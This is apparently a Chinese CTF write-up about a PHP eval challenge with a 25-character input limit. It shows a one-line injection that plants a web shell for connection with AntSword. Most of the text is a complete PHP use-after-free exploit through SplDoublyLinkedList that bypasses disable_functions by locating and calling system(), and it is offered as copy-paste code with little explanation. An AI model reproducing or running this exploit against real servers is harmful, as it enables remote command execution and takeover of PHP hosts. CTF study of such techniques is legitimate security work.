<?php highlight_file(__FILE__); $cmd=$_POST['a']; if(strlen($cmd) > 25){ die(); }else{ eval($cmd); }
可以看到PHP Version 7.3.24、被禁用的函数如下:
Name:a Value:eval($_POST['shaw']);
连接密码填shaw,成功连接。然后是一个阉割shell,经测试无法使用蚂剑的Bypass disable function插件。查阅了下资料,下面这个脚本可以用,🐎一下:
<?php error_reporting(0); $a = str_repeat("T", 120 * 1024 * 1024); function i2s(&$a, $p, $i, $x = 8) { for($j = 0;$j < $x;$j++) { $a[$p + $j] = chr($i & 0xff); $i >>= 8; } } function s2i($s) { $result = 0; for ($x = 0;$x < strlen($s);$x++) { $result <<= 8; $result |= ord($s[$x]); } return $result; } function leak(&$a, $address) { global $s; i2s($a, 0x00, $address - 0x10); return strlen($s -> current()); } function getPHPChunk($maps) { $pattern = '/([0-9a-f]+\-[0-9a-f]+) rw\-p 00000000 00:00 0 /'; preg_match_all($pattern, $maps, $match); foreach ($match[1] as $value) { list($start, $end) = explode("-", $value); if (($length = s2i(hex2bin($end)) - s2i(hex2bin($start))) >= 0x200000 && $length <= 0x300000) { $address = array(s2i(hex2bin($start)), s2i(hex2bin($end)), $length); echo "[+]PHP Chunk: " . $start . " - " . $end . ", length: 0x" . dechex($length) . "\n"; return $address; } } } function bomb1(&$a) { if (leak($a, s2i($_GET["test1"])) === 0x5454545454545454) { return (s2i($_GET["test1"]) & 0x7ffff0000000); }else { die("[!]Where is here"); } } function bomb2(&$a) { $start = s2i($_GET["test2"]); return getElement($a, array($start, $start + 0x200000, 0x200000)); die("[!]Not Found"); } function getElement(&$a, $address) { for ($x = 0;$x < ($address[2] / 0x1000 - 2);$x++) { $addr = 0x108 + $address[0] + 0x1000 * $x + 0x1000; for ($y = 0;$y < 5;$y++) { if (leak($a, $addr + $y * 0x08) === 0x1234567812345678 && ((leak($a, $addr + $y * 0x08 - 0x08) & 0xffffffff) === 0x01)){ echo "[+]SplDoublyLinkedList Element: " . dechex($addr + $y * 0x08 - 0x18) . "\n"; return $addr + $y * 0x08 - 0x18; } } } } function getClosureChunk(&$a, $address) { do { $address = leak($a, $address); }while(leak($a, $address) !== 0x00); echo "[+]Closure Chunk: " . dechex($address) . "\n"; return $address; } function getSystem(&$a, $address) { $start = $address & 0xffffffffffff0000; $lowestAddr = ($address & 0x0000fffffff00000) - 0x0000000001000000; for($i = 0; $i < 0x1000 * 0x80; $i++) { $addr = $start - $i * 0x20; if ($addr < $lowestAddr) { break; } $nameAddr = leak($a, $addr); if ($nameAddr > $address || $nameAddr < $lowestAddr) { continue; } $name = dechex(leak($a, $nameAddr)); $name = str_pad($name, 16, "0", STR_PAD_LEFT); $name = strrev(hex2bin($name)); $name = explode("\x00", $name)[0]; if($name === "system") { return leak($a, $addr + 0x08); } } } class Trigger { function __destruct() { global $s; unset($s[0]); $a = str_shuffle(str_repeat("T", 0xf)); i2s($a, 0x00, 0x1234567812345678); i2s($a, 0x08, 0x04, 7); $s -> current(); $s -> next(); if ($s -> current() !== 0x1234567812345678) { die("[!]UAF Failed"); } $maps = file_get_contents("/proc/self/maps"); if (!$maps) { cantRead($a); }else { canRead($maps, $a); } echo "[+]Done"; } } function bypass($elementAddress, &$a) { global $s; if (!$closureChunkAddress = getClosureChunk($a, $elementAddress)) { die("[!]Get Closure Chunk Address Failed"); } $closure_object = leak($a, $closureChunkAddress + 0x18); echo "[+]Closure Object: " . dechex($closure_object) . "\n"; $closure_handlers = leak($a, $closure_object + 0x18); echo "[+]Closure Handler: " . dechex($closure_handlers) . "\n"; if(!($system_address = getSystem($a, $closure_handlers))) { die("[!]Couldn't determine system address"); } echo "[+]Find system's handler: " . dechex($system_address) . "\n"; i2s($a, 0x08, 0x506, 7); for ($i = 0;$i < (0x130 / 0x08);$i++) { $data = leak($a, $closure_object + 0x08 * $i); i2s($a, 0x00, $closure_object + 0x30); i2s($s -> current(), 0x08 * $i + 0x100, $data); } i2s($a, 0x00, $closure_object + 0x30); i2s($s -> current(), 0x20, $system_address); i2s($a, 0x00, $closure_object); i2s($a, 0x08, 0x108, 7); echo "[+]Executing command: \n"; ($s -> current())("php -v"); } function canRead($maps, &$a) { global $s; if (!$chunkAddress = getPHPChunk($maps)) { die("[!]Get PHP Chunk Address Failed"); } i2s($a, 0x08, 0x06, 7); if (!$elementAddress = getElement($a, $chunkAddress)) { die("[!]Get SplDoublyLinkedList Element Address Failed"); } bypass($elementAddress, $a); } function cantRead(&$a) { global $s; i2s($a, 0x08, 0x06, 7); if (!isset($_GET["test1"]) && !isset($_GET["test2"])) { die("[!]Please try to get address of PHP Chunk"); } if (isset($_GET["test1"])) { die(dechex(bomb1($a))); } if (isset($_GET["test2"])) { $elementAddress = bomb2($a); } if (!$elementAddress) { die("[!]Get SplDoublyLinkedList Element Address Failed"); } bypass($elementAddress, $a); } $s = new SplDoublyLinkedList(); $s -> push(new Trigger()); $s -> push("Twings"); $s -> push(function($x){}); for ($x = 0;$x < 0x100;$x++) { $s -> push(0x1234567812345678); } $s -> rewind(); unset($s[0]);